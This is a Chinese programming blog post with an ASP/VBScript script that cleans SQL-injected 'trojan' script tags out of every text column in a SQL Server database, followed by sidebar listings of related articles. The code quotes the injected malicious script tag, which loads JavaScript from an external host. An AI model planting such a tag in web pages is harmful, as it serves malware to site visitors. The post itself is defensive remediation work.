恢复 SQL 被注入后的数据代码

最新推荐文章于 2024-08-09 16:35:51 发布
最新推荐文章于 2024-08-09 16:35:51 发布
阅读量307 收藏
点赞数
分类专栏: ASP/ASPX/C# WEB技术及应用 文章标签: sql vbscript 存储 面试 c
  1. <%@LANGUAGE="VBSCRIPT" CODEPAGE="936"%>  
  2. <!--#include file="Inc/conn.asp"-->  
  3. <meta http-equiv="Content-Type" content="text/html; charset=gb2312">  
  4. <%   
  5. server.ScriptTimeout = 1000000  
  6.   
  7. 'xtype=99 ntext  与text类型相似,不同的是,ntext类型采用unicode标准字符集。    
  8. 'xtype=35 text  用于存储大量文本数据。    
  9. 'xtype=231 nvarchar 用来定义可变长度的二进制数据,最大长度为4000个字符。    
  10. 'xtype=167 varchar 存储最常可以达到8000个字符的变长的字符数据    
  11.   
  12. str = "'<mce:script src="http://e6t.3322.org/c.js" mce_src="http://e6t.3322.org/c.js"></mce:script>'" '加在文本类型字段后的木马代码   
  13. sql = "SELECT a.name as t_name,b.name as c_name, b.xtype FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167)"  
  14. set rs = conn.execute(sql)   
  15. while Not rs.eof   
  16.     t_name = rs("t_name") '表名   
  17.     c_name = rs("c_name") '字段名   
  18.     xtype = rs("xtype")   '字段类型   
  19.   
  20.     If (xtype = 99 Or xtype = 35) then   
  21.     conn.execute("update [" + t_name + "] set [" + c_name + "]=replace(cast([" + c_name + "] as varchar(8000)), " + str + ", '')")   
  22.     Else    
  23.         conn.execute("update [" + t_name + "] set [" + c_name + "]=replace([" + c_name + "], " + str + ", '')")   
  24.     End If    
  25.        
  26.     rs.movenext   
  27. wend   
  28.   
  29. response.Write("已经初步清理了挂马数据,请重新刷新页面试试看!")   
  30. %>  
webclass
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sql.rar_sql注入_恶意代码
09-19
描述中提到的“批量替换数据库中的字符串”是应对SQL注入的一种策略,特别是在发现系统已经被恶意代码注入后。一旦恶意代码进入数据库,它可能用于窃取敏感数据、篡改信息或使系统瘫痪。因此,管理员可能需要使用...
sql connect.zip_connect_数据恢复
09-23
确保安全的SQL连接是非常重要的,因为它涉及到防止SQL注入攻击,这是一种常见的网络安全威胁,攻击者通过输入恶意的SQL语句来获取、修改或删除敏感数据数据恢复是一个复杂的过程,尤其在数据库环境中,它涉及到...
sqlmap sql 注入测试工具
03-06
1. SQL注入简介:SQL注入是一种常见的网络安全威胁,攻击者通过输入恶意的SQL代码来操纵数据库查询,获取未经授权的数据访问权限,甚至控制整个数据库系统。SQLMap的出现使得测试和防范这一威胁变得更加高效。 2. ...
SQL_zhuru.rar_sql 注入_sql注入
09-24
SQL注入是一种常见的网络安全威胁,它发生在应用程序未能充分验证或过滤用户输入的数据,导致这些数据被误用为数据库查询的一部分。这种攻击方式可以让攻击者通过构造特定的SQL语句来获取、修改、删除或者控制数据库...
kubernetes集群部署sql server数据库服务
jiang0615csdn的博客
08-08 472
kubernetes集群部署sql server数据库服务
dbeaver 导入sql 报错,ERROR 2059 (HY000)
hyq_07_27的博客
08-07 265
ERROR 2059 (HY000): Authentication plugin ‘caching_sha2_password’ cannot be loaded: 鎵句笉鍒版寚瀹氱殑妯″潡銆�。下载后解压压缩包,点击“添加数据库地址”按钮,选择新的MySQL8的所在目录.再次导入就可以了。可以下载 MySQL免安装版配置教程mysql-8.0.39-winx64.zip。先mysql连接设置,查看一下dbeaver的mysql 版本,是5.5.62.版本问题,MySQL8之后更换了密码认证策略。
QSqlQueryModel与QSqlTableModel查询数据
weixin_39688581的博客
08-08 225
项目中需要对数据进行查询与展示,数据量不大,使用的是sqlite数据库,将使用过程记录如下。
postgreSQL16添加审计功能
ciqingloveless的博客
08-07 215
他的分支版本支持不同的PGSQL按需下载。
PostgreSQL JSON 字段操作指南
最新发布
Java小白白的博客
08-09 471
PostgreSQL 提供了强大的 JSON 和 JSONB 数据类型支持,允许存储和处理结构化的 JSON 数据。在实际应用中,我们经常需要从 JSON 字段中提取多层嵌套的属性或处理数组中的数据。本文将详细介绍如何在 PostgreSQL 中获取和操作 JSON 字段中的属性值。
[Meachines] [Easy] SwagShop Magento SQLI+Magento 反序列化RCE+vi权限提升
08-06 410
#Magento SQLI #Magento 反序列化RCE #vi权限提升
MySQL2 DML数据操纵语言和SQL约束
Stringzhua的博客
08-06 1181
DML数据操纵语言和SQL约束
sql常用语法总结
零度°C的博客
08-06 1560
除了基本的内连接(INNER JOIN),还有左连接(LEFT JOIN)、右连接(RIGHT JOIN)和全外连接(FULL OUTER JOIN)。- 允许声明临时的结果集,可以被一个或多个SELECT、INSERT、UPDATE或DELETE语句引用。- 自动执行的SQL语句,通常在INSERT、UPDATE或DELETE操作发生时触发。- 保证一系列操作要么全部成功,要么全部失败,且对数据库的修改是原子性的。- 事务是一组操作,要么全部成功,要么全部失败。- 子查询是嵌套在另一个查询中的查询。
SQL】产品销售分析 I
Frost_Descent的博客
08-08 651
product_id 是关联到产品表 Product 的外键(reference 列)。(sale_id, year) 是销售表 Sales 的主键(具有唯一值的列的组合)。连接id和name :ON s.product_id = p.product_id。需要p.product_name , s.year , s.price。该表的每一行显示 product_id 在某一年的销售情况。product_id 是表的主键(具有唯一值的列)。该表的每一行表示每种产品的产品名称。编写解决方案,以获取。
sql server 通过 sql查询今天、本周、上周、本月、上月、今年、去年的时间范围
张猿的日常
08-06 394
因为经常用到,做个笔记记录下。
SQL创建数据表的一些语句
kobe_okok的博客
08-06 327
代码SQL创建数据表的一些语句。
PostgreSQL-01-入门篇-简介
被拯救的威尼斯的博客
08-06 875
相比之下,PostgreSQL 采用了类似于 MIT 的许可协议,允许开发人员在开源或闭源产品中自由使用,这使得 PostgreSQL 成为了一种极具吸引力的选择。1990 年 6 月发布的版本 2 包含了重新设计的规则系统。Postgres95 的开发重点在于识别和解决后端代码的问题,而 PostgreSQL 的开发则转向了更具争议性的特性和功能,尽管这两个方面的工作同时进行。随着外部用户社区的增长,代码维护的时间成本增加,为了减少支持负担,伯克利的 POSTGRES 项目在版本 4.2 时正式终止。
Hive SQL ——窗口函数源码阅读
爱吃辣条的博客
08-04 1346
Hive SQL ——窗口函数源码阅读
驰骋BPM RunSQL_Init SQL注入漏洞复现
0xSec
08-09 496
驰骋BPM RunSQL_Init 存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用SQL注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
SQL注入攻击与防御:实战指南
SQL注入攻击的发生通常是由于Web应用程序没有正确地过滤或转义用户输入的数据,使得恶意的SQL语句能够被数据库执行。攻击者可以通过构造特定的查询字符串,绕过验证机制,执行非授权的操作,例如读取敏感数据、修改...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值